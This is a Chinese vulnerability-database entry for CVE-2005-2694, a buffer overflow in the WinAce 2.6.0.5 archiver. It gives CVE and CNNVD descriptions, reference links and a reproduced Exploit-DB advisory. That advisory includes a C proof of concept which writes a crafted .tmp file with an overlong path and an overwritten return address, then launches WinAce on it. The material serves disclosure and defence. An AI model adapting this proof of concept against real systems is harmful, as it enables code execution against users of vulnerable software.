CVE-2005-2694
CVSS7.5
发布时间 :2005-08-26 11:50:00
修订时间 :2016-10-17 23:29:29
NMCOE    

[原文]Buffer overflow in WinAce 2.6.0.5, and possibly earlier versions, allows remote attackers to execute arbitrary code via a temporary (.tmp) file that contains an entry with a long file name.


[CNNVD]WinAce 缓冲区溢出(CNNVD-200508-292)

        WinAce 2.6.0.5及其可能的早期版本中存在缓冲区溢出。这使得远程攻击者可以借助于文件名较长的临时文件(.tmp)(包含记录)执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2694
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2694
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-292
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112447630109392&w=2
(UNKNOWN)  BUGTRAQ  20050819 WinAce Temporary File Parsing Buffer Overflow Vulnerability
http://xforce.iss.net/xforce/xfdb/21941
(UNKNOWN)  XF  winace-temporary-file-bo(21941)

- 漏洞信息

WinAce 缓冲区溢出
高危 缓冲区溢出
2005-08-26 00:00:00 2005-10-20 00:00:00
远程  
        WinAce 2.6.0.5及其可能的早期版本中存在缓冲区溢出。这使得远程攻击者可以借助于文件名较长的临时文件(.tmp)(包含记录)执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1168)

WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow Vulnerability (EDBID:1168)
windows local
2005-08-19 Verified
0 ATmaCA
N/A [点击下载]
/*
===========================================================================
Application: 	WinAce
		http://www.winace.com/
Versions:	2.6.0.5
Platforms:	Windows
Bug:		buffer-overflow
Exploitation:	local
Date:		Jul 22 2004
Author:		ATmaCA
		e-mail: atmaca@icqmail.com
		web:    http://www.atmacasoft.com
Credit:		Kozan  		
===========================================================================

I. BACKGROUND

WinAce is an archiving utility with an easy-to-use interface for creating,
extracting, and viewing archives. It includes built-in compression for
ACE, ZIP, LHA, and MS CAB formats, and built-in decompression for
ACE, ZIP, LHA, MS CAB, RAR, ARJ, ARC, GZIP, TAR, and ZOO formats.
You can create multivolume (disk-spanning) archives for ACE and MS CAB formats
and self-extracting archives (SFX) for ACE and ZIP formats.  

More information about WinAce is available from:
http://www.winace.com/winace.html

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in WinAce
allows attackers to execute arbitrary code.

When WinAce attempts to compress any file, firstly it creates temporary file which contains 
the location of the file which will be compressed.
The problem specifically exists when parsing temporary files that contain long file entries.

An example malicious .tmp file with a long file name:

	c:\AAAAAAAAA...[A x 2021 bytes is where the EIP starts]1234[AAAA...AAAAA]\r\n

Command line:

	"C:\Program Files\WinAce\winace.exe" a "C:\Program Files\WinAce\winace" @c:\crafted.tmp

'[A x 2021]' represents any string of 2021 bytes in
length. Opening either malicious tmp file on the Microsoft Windows
platform will cause WinAce to crash with an access violation when
attempting to execute instruction 0x34333231, which is the little-endian
ASCII code representation of '1234'. An attacker can exploit this
vulnerability to redirect the flow of control and eventually execute
arbitrary code. This example is specific to the Microsoft Windows
platform.

III. ANALYSIS

Exploitation of the described vulnerability allows remote attackers to
execute arbitrary code under the context of the user who started WinAce.

Exploitation requires that an attacker to execute arbitrary command line which contain location of malicious tmp file.

IV. DETECTION

WinAce 2.6.0.5 as installed on the Microsoft Windows
platform is affected. Earlier versions may also be susceptible.

V. DISCLOSURE TIMELINE

07/22/2005  Initial vendor notification
07/25/2005  Initial vendor response
08/19/2005  Public disclosure

VI. POC:
*/

/*
*
* WinAce Temporary File Parsing Buffer Overflow Vulnerability
* http://www.winace.com/winace.html
* Discovered & Coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
*
*/

/*
*
* Tested with WinAce 2.6.0.5 as installed on the Win XP Sp2 En platform
*
*/

#include <windows.h>
#include <stdio.h>

void main()
{
        // create crafted command line
        char tmpfile[] = "c:\\crafted.tmp";
        char winacepath[] = "\"C:\\Program Files\\WinAce\\winace.exe\"";
        char compresspar[] = " a \"C:\\Program Files\\WinAce\\winace\" @";
        char runpar[300];
        int i = 0;
        char Ret_Addr[]= "\x31\x32\x33\x34";

        strcpy(runpar,winacepath);
        strcat(runpar,compresspar);
        strcat(runpar,tmpfile);

        // create crafted .tmp file
        FILE *di;
        if( (di=fopen(tmpfile,"wb")) == NULL ){
                return;
        }

        fprintf(di,"c:\\");

        for(i=0;i<2013;i++)
                fputc(0x41,di);

        // Overwriting the return address (EIP)
        fprintf(di,Ret_Addr); //EIP

        for(i=0;i<178;i++)
                fputc(0x41,di);

        // end of file
        fprintf(di,"\x2E\x74\x78\x74\x0D\x0A");

        fclose(di);
        WinExec(runpar,SW_SHOW);
}

// milw0rm.com [2005-08-19]
		

- 漏洞信息

18966
WinACE Temporary File Processing Long File Entry Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-19 2005-07-22
2005-08-19 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站